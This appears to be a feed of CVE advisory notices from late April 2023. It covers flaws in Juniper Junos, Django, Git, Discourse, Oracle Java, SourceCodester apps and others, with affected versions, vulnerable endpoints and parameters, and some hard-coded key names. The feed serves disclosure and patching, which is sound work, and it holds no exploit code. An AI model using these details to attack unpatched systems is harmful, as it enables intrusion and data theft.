🚨 CVE-2023-28973An Improper Authorization vulnerability in the 'sysmanctl' shell command of Juniper Networks Junos OS Evolved allows a local, authenticated attacker to execute administrative commands that could impact the integrity of the system or system availability. Administrative functions such as daemon restarting, routing engine (RE) switchover, and node shutdown can all be performed through exploitation of the 'sysmanctl' command. Access to the 'sysmanctl' command is only available from the Junos shell. Neither direct nor indirect access to 'sysmanctl' is available from the Junos CLI. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R3-S5-EVO; 21.2 versions prior to 21.2R3-EVO; 21.3 versions prior to 21.3R2-EVO; 21.4 versions prior to 21.4R1-S2-EVO, 21.4R2-EVO.🎖@cveNotify |
|
| 2023-04-28 16:58:30 |
🚨 CVE-2023-28972An Improper Link Resolution Before File Access vulnerability in console port access of Juniper Networks Junos OS on NFX Series allows an attacker to bypass console access controls. When "set system ports console insecure" is enabled, root login is disallowed for Junos OS as expected. However, the root password can be changed using "set system root-authentication plain-text-password" on NFX Series systems, leading to a possible administrative bypass with physical access to the console. Password recovery, changing the root password from a console, should not have been allowed from an insecure console. This is similar to the vulnerability described in CVE-2019-0035 but affects different platforms and in turn requires a different fix. This issue affects Juniper Networks Junos OS on NFX Series: 19.2 versions prior to 19.2R3-S7; 19.3 versions prior to 19.3R3-S8; 19.4 versions prior to 19.4R3-S12; 20.2 versions prior to 20.2R3-S8; 20.4 versions prior to 20.4R3-S7; 21.1 versions prior to 21.1R3-S5; 21.2 versions prior to 21.2R3-S4; 21.3 versions prior to 21.3R3-S3; 21.4 versions prior to 21.4R3-S2; 22.1 versions prior to 22.1R3-S1; 22.2 versions prior to 22.2R2-S1, 22.2R3; 22.3 versions prior to 22.3R1-S2, 22.3R2.🎖@cveNotify |
|
| 2023-04-28 16:58:26 |
🚨 CVE-2023-28471Concrete CMS (previously concrete5) before 9.2 is vulnerable to Stored XSS via a container name.🎖@cveNotify |
|
| 2023-04-28 16:58:25 |
🚨 CVE-2023-28476Concrete CMS (previously concrete5) before 9.2 is vulnerable to Stored XSS on Tags on uploaded files.🎖@cveNotify |
|
| 2023-04-28 16:58:24 |
🚨 CVE-2023-2370A vulnerability classified as critical has been found in SourceCodester Online DJ Management System 1.0. Affected is an unknown function of the file admin/events/manage_event.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-227646 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-28 16:58:20 |
🚨 CVE-2023-2371A vulnerability classified as critical was found in SourceCodester Online DJ Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/inquiries/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227647.🎖@cveNotify |
|
| 2023-04-28 16:58:19 |
🚨 CVE-2023-30123wuzhicms v4.1.0 is vulnerable to Cross Site Scripting (XSS) in the Member Center, Account Settings.🎖@cveNotify |
|
| 2023-04-28 16:58:18 |
🚨 CVE-2023-28473Concrete CMS (previously concrete5) before 9.2 is vulnerable to possible Auth bypass in the jobs section.🎖@cveNotify |
|
| 2023-04-28 16:58:17 |
🚨 CVE-2023-28474Concrete CMS (previously concrete5) before 9.2 is vulnerable to Stored XSS on Saved Presets on search.🎖@cveNotify |
|
| 2023-04-28 14:58:33 |
🚨 CVE-2023-25556A CWE-287: Improper Authentication vulnerability exists that could allow a device to becompromised when a key of less than seven digits is entered and the attacker has access to theKNX installation.🎖@cveNotify |
|
| 2023-04-28 14:58:32 |
🚨 CVE-2023-29411A CWE-306: Missing Authentication for Critical Function vulnerability exists that could allowchanges to administrative credentials, leading to potential remote code execution withoutrequiring prior authentication on the Java RMI interface. 🎖@cveNotify |
|
| 2023-04-28 14:58:31 |
🚨 CVE-2023-29412A CWE-78: Improper Handling of Case Sensitivity vulnerability exists that could cause remotecode execution when manipulating internal methods through Java RMI interface. 🎖@cveNotify |
|
| 2023-04-28 14:58:30 |
🚨 CVE-2023-28004A CWE-129: Improper validation of an array index vulnerability exists where a specially craftedEthernet request could result in denial of service or remote code execution. 🎖@cveNotify |
|
| 2023-04-28 14:58:26 |
🚨 CVE-2023-28142A Race Condition exists in the Qualys Cloud Agent for Windowsplatform in versions from 3.1.3.34 and before 4.5.3.1. This allows attackers toescalate privileges limited on the local machine during uninstallation of theQualys Cloud Agent for Windows. Attackers may gain SYSTEM level privileges onthat asset to run arbitrary commands.At the time of this disclosure, versions before 4.0 are classified as Endof Life.🎖@cveNotify |
|
| 2023-04-28 14:58:25 |
🚨 CVE-2022-41397The optional Web Screens and Global Search features for Sage 300 through version 2022 use a hard-coded 40-byte blowfish key ("LandlordPassKey") to encrypt and decrypt secrets stored in configuration files and in database tables.🎖@cveNotify |
|
| 2023-04-28 14:58:24 |
🚨 CVE-2022-41398The optional Global Search feature for Sage 300 through version 2022 uses a set of hard-coded credentials for the accompanying Apache Solr instance. This issue could allow attackers to login to the Solr dashboard with admin privileges and access sensitive information.🎖@cveNotify |
|
| 2023-04-28 14:58:23 |
🚨 CVE-2022-41399The optional Web Screens feature for Sage 300 through version 2022 uses a hard-coded 40-byte blowfish key ("PASS_KEY") to encrypt and decrypt the database connection string for the PORTAL database found in the "dbconfig.xml". This issue could allow attackers to obtain access to the SQL database.🎖@cveNotify |
|
| 2023-04-28 14:58:20 |
🚨 CVE-2022-41400Sage 300 through 2022 uses a hard-coded 40-byte blowfish key to encrypt and decrypt user passwords and SQL connection strings stored in ISAM database files in the shared data directory. This issue could allow attackers to decrypt user passwords and SQL connection strings.🎖@cveNotify |
|
| 2023-04-28 14:58:19 |
🚨 CVE-2023-2368A vulnerability was found in SourceCodester Faculty Evaluation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file index.php?page=manage_questionnaire. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227644.🎖@cveNotify |
|
| 2023-04-28 14:58:18 |
🚨 CVE-2023-30024Insecure Permissions vulnerability found in MagicJack A921 USB Phone Jack Rev 3.0 v.1.4 allows a physically proximate attacker to escalate privileges and gain access to sensitive information via the NAND flash memory.🎖@cveNotify |
|
| 2023-04-28 14:58:14 |
🚨 CVE-2023-26735** DISPUTED ** blackbox_exporter v0.23.0 was discovered to contain an access control issue in its probe interface. This vulnerability allows attackers to detect intranet ports and services, as well as download resources. NOTE: this is disputed by third parties because authentication can be configured.🎖@cveNotify |
|
| 2023-04-28 14:58:13 |
🚨 CVE-2023-2360Sensitive information disclosure due to CORS misconfiguration. The following products are affected: Acronis Cyber Infrastructure (ACI) before build 5.2.0-135.🎖@cveNotify |
|
| 2023-04-28 14:58:12 |
🚨 CVE-2022-48481In JetBrains Toolbox App before 1.28 a DYLIB injection on macOS was possible🎖@cveNotify |
|
| 2023-04-28 12:58:22 |
🚨 CVE-2023-2363A vulnerability, which was classified as critical, has been found in SourceCodester Resort Reservation System 1.0. This issue affects some unknown processing of the file view_room.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227639.🎖@cveNotify |
|
| 2023-04-28 12:58:18 |
🚨 CVE-2023-2364A vulnerability, which was classified as problematic, was found in SourceCodester Resort Reservation System 1.0. Affected is an unknown function of the file registration.php. The manipulation of the argument fullname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227640.🎖@cveNotify |
|
| 2023-04-28 12:58:17 |
🚨 CVE-2023-30466This vulnerability exists in Milesight 4K/H.265 Series NVR models (MS-Nxxxx-xxG, MS-Nxxxx-xxE, MS-Nxxxx-xxT, MS-Nxxxx-xxH and MS-Nxxxx-xxC), due to a weak password reset mechanism at the Milesight NVR web-based management interface. A remote attacker could exploit this vulnerability by sending a specially crafted http requests on the targeted device.Successful exploitation of this vulnerability could allow remote attacker to account takeover on the targeted device.🎖@cveNotify |
|
| 2023-04-28 12:58:16 |
🚨 CVE-2023-30467This vulnerability exists in Milesight 4K/H.265 Series NVR models (MS-Nxxxx-xxG, MS-Nxxxx-xxE, MS-Nxxxx-xxT, MS-Nxxxx-xxH and MS-Nxxxx-xxC), due to improper authorization at the Milesight NVR web-based management interface. A remote attacker could exploit this vulnerability by sending a specially crafted http requests on the targeted device.Successful exploitation of this vulnerability could allow remote attacker to perform unauthorized activities on the targeted device.🎖@cveNotify |
|
| 2023-04-28 12:58:15 |
🚨 CVE-2023-26876SQL injection vulnerability found in Piwigo v.13.5.0 and before allows a remote attacker to execute arbitrary code via the filter_user_id parameter to the admin.php?page=history&filter_image_id=&filter_user_id endpoint.🎖@cveNotify |
|
| 2023-04-28 12:58:14 |
🚨 CVE-2022-48481In JetBrains Toolbox App before 1.28 a DYLIB injection on macOS was possible🎖@cveNotify |
|
| 2023-04-28 11:58:50 |
🚨 CVE-2023-2361Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.21.🎖@cveNotify |
|
| 2023-04-28 11:58:47 |
🚨 CVE-2023-2331Unquoted service Path or Element vulnerability in 42Gears Surelock Windows SureLock Service (NixService.Exe) on Windows application will allows to insert arbitrary code into the service.This issue affects Surelock Windows : from 2.3.12 through 2.40.0.🎖@cveNotify |
|
| 2023-04-28 11:58:44 |
🚨 CVE-2023-25815In Git for Windows, the Windows port of Git, no localized messages are shipped with the installer. As a consequence, Git is expected not to localize messages at all, and skips the gettext initialization. However, due to a change in MINGW-packages, the `gettext()` function's implicit initialization no longer uses the runtime prefix but uses the hard-coded path `C:\mingw64\share\locale` to look for localized messages. And since any authenticated user has the permission to create folders in `C:\` (and since `C:\mingw64` does not typically exist), it is possible for low-privilege users to place fake messages in that location where `git.exe` will pick them up in version 2.40.1.This vulnerability is relatively hard to exploit and requires social engineering. For example, a legitimate message at the end of a clone could be maliciously modified to ask the user to direct their web browser to a malicious website, and the user might think that the message comes from Git and is legitimate. It does require local write access by the attacker, though, which makes this attack vector less likely. Version 2.40.1 contains a patch for this issue. Some workarounds are available. Do not work on a Windows machine with shared accounts, or alternatively create a `C:\mingw64` folder and leave it empty. Users who have administrative rights may remove the permission to create folders in `C:\`.🎖@cveNotify |
|
| 2023-04-28 11:58:42 |
🚨 CVE-2023-29007Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a specially crafted `.gitmodules` file with submodule URLs that are longer than 1024 characters can used to exploit a bug in `config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used to inject arbitrary configuration into a user's `$GIT_DIR/config` when attempting to remove the configuration section associated with that submodule. When the attacker injects configuration values which specify executables to run (such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to a remote code execution. A fix A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid running `git submodule deinit` on untrusted repositories or without prior inspection of any submodule sections in `$GIT_DIR/config`.🎖@cveNotify |
|
| 2023-04-28 11:58:41 |
🚨 CVE-2023-25652Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents (corresponding to the rejected hunk(s) from the given patch). A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid using `git apply` with `--reject` when applying patches from an untrusted source. Use `git apply --stat` to inspect a patch before applying; avoid applying one that create a conflict where a link corresponding to the `*.rej` file exists.🎖@cveNotify |
|
| 2023-04-28 11:58:39 |
🚨 CVE-2022-42335x86 shadow paging arbitrary pointer dereference In environments where host assisted address translation is necessary but Hardware Assisted Paging (HAP) is unavailable, Xen will run guests in so called shadow mode. Due to too lax a check in one of the hypervisor routines used for shadow page handling it is possible for a guest with a PCI device passed through to cause the hypervisor to access an arbitrary pointer partially under guest control.🎖@cveNotify |
|
| 2023-04-28 11:58:38 |
🚨 CVE-2023-24580An issue was discovered in the Multipart Request Parser in Django 3.2 before 3.2.18, 4.0 before 4.0.10, and 4.1 before 4.1.7. Passing certain inputs (e.g., an excessive number of parts) to multipart forms could result in too many open files or memory exhaustion, and provided a potential vector for a denial-of-service attack.🎖@cveNotify |
|
| 2023-04-28 11:58:36 |
🚨 CVE-2023-23969In Django 3.2 before 3.2.17, 4.0 before 4.0.9, and 4.1 before 4.1.6, the parsed values of Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial-of-service vector via excessive memory usage if the raw value of Accept-Language headers is very large.🎖@cveNotify |
|
| 2023-04-28 11:58:34 |
🚨 CVE-2022-41323In Django 3.2 before 3.2.16, 4.0 before 4.0.8, and 4.1 before 4.1.2, internationalized URLs were subject to a potential denial of service attack via the locale parameter, which is treated as a regular expression.🎖@cveNotify |
|
| 2023-04-28 11:58:32 |
🚨 CVE-2022-36359An issue was discovered in the HTTP FileResponse class in Django 3.2 before 3.2.15 and 4.0 before 4.0.7. An application is vulnerable to a reflected file download (RFD) attack that sets the Content-Disposition header of a FileResponse when the filename is derived from user-supplied input.🎖@cveNotify |
|
| 2023-04-28 11:58:30 |
🚨 CVE-2022-34265An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.🎖@cveNotify |
|
| 2023-04-28 11:58:29 |
🚨 CVE-2022-28346An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.🎖@cveNotify |
|
| 2023-04-28 11:58:27 |
🚨 CVE-2022-28347A SQL injection issue was discovered in QuerySet.explain() in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. This occurs by passing a crafted dictionary (with dictionary expansion) as the **options argument, and placing the injection payload in an option name.🎖@cveNotify |
|
| 2023-04-28 05:58:43 |
🚨 CVE-2023-29570Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_ffi_cb_free at src/mjs_ffi.c. This vulnerability can lead to a Denial of Service (DoS).🎖@cveNotify |
|
| 2023-04-28 05:58:42 |
🚨 CVE-2023-29196Discourse is an open source platform for community discussion. This vulnerability is not exploitable on the default install of Discourse. A custom feature must be enabled for it to work at all, and the attacker’s payload must pass the CSP to be executed. However, if an attacker succeeds in embedding Javascript that does pass the CSP, it could result in session hijacking for any users that view the attacker’s post. The vulnerability is patched in the latest tests-passed, beta and stable branches. Users are advised to upgrade. Users unable to upgrade should enable and/or restore your site's CSP to the default one provided with Discourse. Remove any embed-able hosts configured.🎖@cveNotify |
|
| 2023-04-28 05:58:41 |
🚨 CVE-2023-30538Discourse is an open source platform for community discussion. Due to the improper sanitization of SVG files, an attacker can execute arbitrary JavaScript on the users’ browsers by uploading a crafted SVG file. This issue is patched in the latest stable and tests-passed versions of Discourse. Users are advised to upgrade. For users unable to upgrade there are two possible workarounds: enable CDN handing of uploads (and ensure the CDN sanitizes SVG files) or disable SVG file uploads by ensuring that the `authorized extensions` site setting does not include `svg` (or reset that setting to the default, by default Discourse doesn't enable SVG uploads by users). 🎖@cveNotify |
|
| 2023-04-28 05:58:38 |
🚨 CVE-2023-30606Discourse is an open source platform for community discussion. In affected versions a user logged as an administrator can call arbitrary methods on the `SiteSetting` class, notably `#clear_cache!` and `#notify_changed!`, which when done on a multisite instance, can affect the entire cluster resulting in a denial of service. Users not running in multisite environments are not affected. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-28 05:58:37 |
🚨 CVE-2023-22309Reflective Cross-Site-Scripting in Webconf in Tribe29 Checkmk Appliance before 1.6.4.🎖@cveNotify |
|
| 2023-04-28 05:58:36 |
🚨 CVE-2023-1767The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to a stored XSS prior to 28th March 2023. A feature of Snyk Advisor is to display the contents of a scanned package's Readme on its package health page. An attacker could create a package in NPM with an associated markdown README file containing XSS-able HTML tags. Upon Snyk Advisor importing the package, the XSS would run each time an end user browsed to the package's page on Snyk Advisor.🎖@cveNotify |
|
| 2023-04-28 05:58:32 |
🚨 CVE-2023-2177A null pointer dereference issue was found in the sctp network protocol in net/sctp/stream_sched.c in Linux Kernel. If stream_in allocation is failed, stream_out is freed which would further be accessed. A local user could use this flaw to crash the system or potentially cause a denial of service.🎖@cveNotify |
|
| 2023-04-28 05:58:31 |
🚨 CVE-2023-29926PowerJob V4.3.2 has unauthorized interface that causes remote code execution.🎖@cveNotify |
|
| 2023-04-28 05:58:30 |
🚨 CVE-2023-2239Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository microweber/microweber prior to 1.3.4.🎖@cveNotify |
|
| 2023-04-28 05:58:27 |
🚨 CVE-2023-2244A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been classified as critical. This affects an unknown part of the file /admin/orders/update_status.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227229 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-28 05:58:26 |
🚨 CVE-2023-29924PowerJob V4.3.1 is vulnerable to Incorrect Access Control that allows for remote code execution.🎖@cveNotify |
|
| 2023-04-28 05:58:25 |
🚨 CVE-2023-2246A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/ajax.php?action=save_settings. The manipulation of the argument img leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227236.🎖@cveNotify |
|
| 2023-04-28 01:58:19 |
🚨 CVE-2023-28400mySCADA myPRO versions 8.26.0 and prior has parameters which an authenticated user could exploit to inject arbitrary operating system commands. 🎖@cveNotify |
|
| 2023-04-28 01:58:18 |
🚨 CVE-2023-29150mySCADA myPRO versions 8.26.0 and prior has parameters which an authenticated user could exploit to inject arbitrary operating system commands. 🎖@cveNotify |
|
| 2023-04-28 01:58:13 |
🚨 CVE-2023-1967Keysight N8844A Data Analytics Web Service deserializes untrusted data without sufficiently verifying the resulting data will be valid. 🎖@cveNotify |
|
| 2023-04-28 01:58:12 |
🚨 CVE-2023-27350This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.🎖@cveNotify |
|
| 2023-04-27 23:58:39 |
🚨 CVE-2021-0884In PVRSRVBridgePhysmemImportSparseDmaBuf of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-270393454🎖@cveNotify |
|
| 2023-04-27 23:58:38 |
🚨 CVE-2021-0881In PVRSRVBridgeRGXKickCDM of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-270396350🎖@cveNotify |
|
| 2023-04-27 23:58:37 |
🚨 CVE-2021-0882In PVRSRVBridgeRGXKickSync of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-270395803🎖@cveNotify |
|
| 2023-04-27 23:58:36 |
🚨 CVE-2023-28440Discourse is an open source platform for community discussion. In affected versions a maliciously crafted request from a Discourse administrator can lead to a long-running request and eventual timeout. This has the greatest potential impact in shared hosting environments where admins are untrusted. This issue has been addressed in versions 3.0.3 and 3.1.0.beta4. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-27 23:58:35 |
🚨 CVE-2023-28839Shoppingfeed PrestaShop is an add-on to the PrestaShop ecommerce platform to synchronize data. The module Shoppingfeed for PrestaShop is vulnerable to SQL injection between version 1.4.0 and 1.8.2 due to a lack of input sanitization. This issue has been addressed in version 1.8.3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-27 23:58:31 |
🚨 CVE-2022-31647Docker Desktop before 4.6.0 on Windows allows attackers to delete any file through the hyperv/destroy dockerBackendV2 API via a symlink in the DataFolder parameter, a different vulnerability than CVE-2022-26659.🎖@cveNotify |
|
| 2023-04-27 23:58:30 |
🚨 CVE-2022-34292Docker Desktop for Windows before 4.6.0 allows attackers to overwrite any file through a symlink attack on the hyperv/create dockerBackendV2 API by controlling the DataFolder parameter for DockerDesktop.vhdx, a similar issue to CVE-2022-31647.🎖@cveNotify |
|
| 2023-04-27 23:58:29 |
🚨 CVE-2022-37326Docker Desktop for Windows before 4.6.0 allows attackers to delete (or create) any file through the dockerBackendV2 windowscontainers/start API by controlling the pidfile field inside the DaemonJSON field in the WindowsContainerStartRequest class. This can indirectly lead to privilege escalation.🎖@cveNotify |
|
| 2023-04-27 23:58:28 |
🚨 CVE-2023-29950swfrender v0.9.2 was discovered to contain a heap buffer overflow in the function enumerateUsedIDs_fillstyle at modules/swftools.c🎖@cveNotify |
|
| 2023-04-27 23:58:24 |
🚨 CVE-2023-24500Electra Central AC unit – Adjacent attacker may cause the unit to load unauthorized FW.🎖@cveNotify |
|
| 2023-04-27 23:58:23 |
🚨 CVE-2023-24501Electra Central AC unit – Hardcoded Credentials in unspecified code used by the unit.🎖@cveNotify |
|
| 2023-04-27 23:58:22 |
🚨 CVE-2023-24502Electra Central AC unit – The unit opens an AP with an easily calculated password.🎖@cveNotify |
|
| 2023-04-27 23:58:21 |
🚨 CVE-2023-24503Electra Central AC unit – Adjacent attacker may cause the unit to load unauthorized FW.🎖@cveNotify |
|
| 2023-04-27 23:58:20 |
🚨 CVE-2023-24504Electra Central AC unit – Adjacent attacker may cause the unit to connect to unauthorized update server.🎖@cveNotify |
|
| 2023-04-27 23:58:16 |
🚨 CVE-2023-28971An Improper Restriction of Communication Channel to Intended Endpoints vulnerability in the timescaledb feature of Juniper Networks Paragon Active Assurance (PAA) (Formerly Netrounds) allows an attacker to bypass existing firewall rules and limitations used to restrict internal communcations. The Test Agents (TA) Appliance connects to the Control Center (CC) using OpenVPN. TA's are assigned an internal IP address in the 100.70.0.0/16 range. Firewall rules exists to limit communication from TA's to the CC to specific services only. OpenVPN is configured to not allow direct communication between Test Agents in the OpenVPN application itself, and routing is normally not enabled on the server running the CC application. The timescaledb feature is installed as an optional package on the Control Center. When the timescaledb container is started, this causes side-effects by bypassing the existing firewall rules and limitations for Test Agent communications. Note: This issue only affects customers hosting their own on-prem Control Center. The Paragon Active Assurance Software as a Service (SaaS) is not affected by this vulnerability since the timescaledb service is not enabled. This issue affects all on-prem versions of Juniper Networks Paragon Active Assurance prior to 4.1.2.🎖@cveNotify |
|
| 2023-04-27 23:58:15 |
🚨 CVE-2023-2160Weak Password Requirements in GitHub repository modoboa/modoboa prior to 2.1.0.🎖@cveNotify |
|
| 2023-04-27 23:58:14 |
🚨 CVE-2023-28863AMI MegaRAC SPx12 and SPx13 devices have Insufficient Verification of Data Authenticity.🎖@cveNotify |
|
| 2023-04-27 23:58:13 |
🚨 CVE-2022-46389There exists a reflected XSS within the logout functionality of ServiceNow versions lower than Quebec Patch 10 Hotfix 11b, Rome Patch 10 Hotfix 3b, San Diego Patch 9, Tokyo Patch 4, and Utah GA. This enables an unauthenticated remote attacker to execute arbitrary JavaScript code in the browser-based web console.🎖@cveNotify |
|
| 2023-04-27 18:58:34 |
🚨 CVE-2023-21835Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 11.0.17, 17.0.5, 19.0.1; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via DTLS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-04-27 18:58:33 |
🚨 CVE-2022-21628Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-04-27 18:58:32 |
🚨 CVE-2022-21619Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-04-27 18:58:28 |
🚨 CVE-2022-21626Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-04-27 18:58:27 |
🚨 CVE-2022-21618Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JGSS). Supported versions that are affected are Oracle Java SE: 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-04-27 18:58:26 |
